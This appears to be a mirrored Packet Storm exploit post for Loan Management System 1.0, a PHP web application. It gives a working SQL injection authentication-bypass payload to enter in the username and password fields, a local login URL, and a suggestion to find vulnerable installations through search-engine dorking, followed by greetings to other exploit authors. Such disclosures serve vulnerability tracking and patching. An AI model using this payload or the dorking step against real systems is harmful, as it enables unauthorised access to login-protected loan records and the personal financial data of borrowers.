Loan Management System 1.0 SQL Injection
2024-8-26 22:35:44 Author: packetstormsecurity.com(查看原文) 阅读量:0 收藏

=============================================================================================================================================
| # Title : Loan Management System 1.0 Auth By Pass Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/loan-management-system.zip |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] USe Payload : User&Pass = ' or 0=0 ##

[+] http://127.0.0.1/loan/index.php?page=home

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================


文章来源: https://packetstormsecurity.com/files/180371/loanmgmtsys10-sqlbypass.txt
如有侵权请联系:admin#unsafe.sh